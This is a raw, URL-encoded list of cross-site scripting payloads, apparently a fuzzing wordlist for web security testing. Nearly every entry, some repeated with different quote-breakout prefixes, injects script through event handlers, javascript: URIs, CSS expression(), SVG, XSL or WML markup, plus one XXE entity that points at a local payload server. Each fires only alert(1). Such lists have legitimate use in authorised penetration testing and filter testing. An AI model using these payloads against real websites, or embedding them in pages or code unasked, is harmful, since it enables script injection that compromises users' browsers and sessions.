%22%3E%3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext '%3E%3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext %3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E %22%3E%3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E '%3E%3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E %3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E %22%3E%3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E '%3E%3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E %3Cinput%20onfocus=alert(1)%20autofocus%3E %22%3E%3Cinput%20onfocus=alert(1)%20autofocus%3E '%3E%3Cinput%20onfocus=alert(1)%20autofocus%3E '%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cg%20onload=%22javascript:alert(1)%22%3E%3C/g%3E%3C/svg%3E %22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cg%20onload=%22javascript:alert(1)%22%3E%3C/g%3E%3C/svg%3E %3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E %22%3E%3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E '%3E%3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E %3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E %22%3E%3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E '%3E%3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E %3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE %22%3E%3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE '%3E%3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE %3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E %22%3E%3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E '%3E%3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E %3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E %22%3E%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E '%3E%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E 1%3Cset/xmlns=%60urn:schemas-microsoft-com:time%60%20style=%60behAvior:url( %3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d %22%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d '%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d %3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E %22%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E '%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E %3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E %22%3E%3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E '%3E%3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E %3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E %22%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E '%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E %3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E %22%3E%3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E '%3E%3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E %3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E %22%3E%3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E '%3E%3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E %3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E %22%3E%3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E '%3E%3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E %3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E %22%3E%3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E '%3E%3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E %3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E %22%3E%3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E '%3E%3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E '%3E%3Cb%20%3Cscript%3Ealert(1)//%3C/script%3E0%3C/script%3E%3C/b%3E%3C/div%3E %22%3E%3Cb%20%3Cscript%3Ealert(1)//%3C/script%3E0%3C/script%3E%3C/b%3E%3C/div%3E '%3E%3Cb%3E%3Cscript%3Cb%3E%3C/b%3E%3Calert(1)%3C/script%20%3C/b%3E%3C/b%3E%3C/div%3E %22%3E%3Cb%3E%3Cscript%3Cb%3E%3C/b%3E%3Calert(1)%3C/script%20%3C/b%3E%3C/b%3E%3C/div%3E '%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E%3C/div%3E %22%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E%3C/div%3E %3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %22%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E '%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %22%3E%3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E '%3E%3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %22%3E%3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E '%3E%3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E %3Cdiv%20id=%221%22%3E%3Cembed%20src=%22javascript:alert(1)%22%3E '%3E%3Cembed%20src=%22javascript:alert(1)%22%3E%3C/embed%3E '%3E%3Cscript%20src=%22javascript:alert(1)%22%3E%3C/script%3E %22%3E%3Cscript%20src=%22javascript:alert(1)%22%3E%3C/script%3E %3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E %22%3E%3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E '%3E%3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E %3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E %22%3E%3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E '%3E%3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E onerror%20CDATA%20%22alert(1)%22 onload%20CDATA%20%22alert(1)%22%3E %3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E %22%3E%3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E '%3E%3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E %3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E %22%3E%3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E '%3E%3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E %3C//%20style=x:expression%028alert(1)%029%3E %22%3E%3C//%20style=x:expression%028alert(1)%029%3E '%3E%3C//%20style=x:expression%028alert(1)%029%3E %3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E %22%3E%3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E '%3E%3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E %3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E %22%3E%3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E '%3E%3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E %3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E %22%3E%3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E '%3E%3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E %3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E %22%3E%3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E '%3E%3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E %3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E %22%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E '%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E %3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E %22%3E%3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E '%3E%3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E %3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,%7bx:expression(write(1));%7d%22?%3E %22%3E%3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,%7bx:expression(write(1));%7d%22?%3E '%3E%3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,*%7bx:expression(write(1));%7d%22?%3E %3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E %22%3E%3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E '%3E%3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E %3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)// %22%3E%3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)// '%3E%3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)// '%3E%3Cbody%20oninput=alert(1)%3E%3Cinput%20autofocus%3E%3Cdiv%20id=%221%22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E %22%3E%3Cbody%20oninput=alert(1)%3E%3Cinput%20autofocus%3E%3Cdiv%20id=%221%22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E
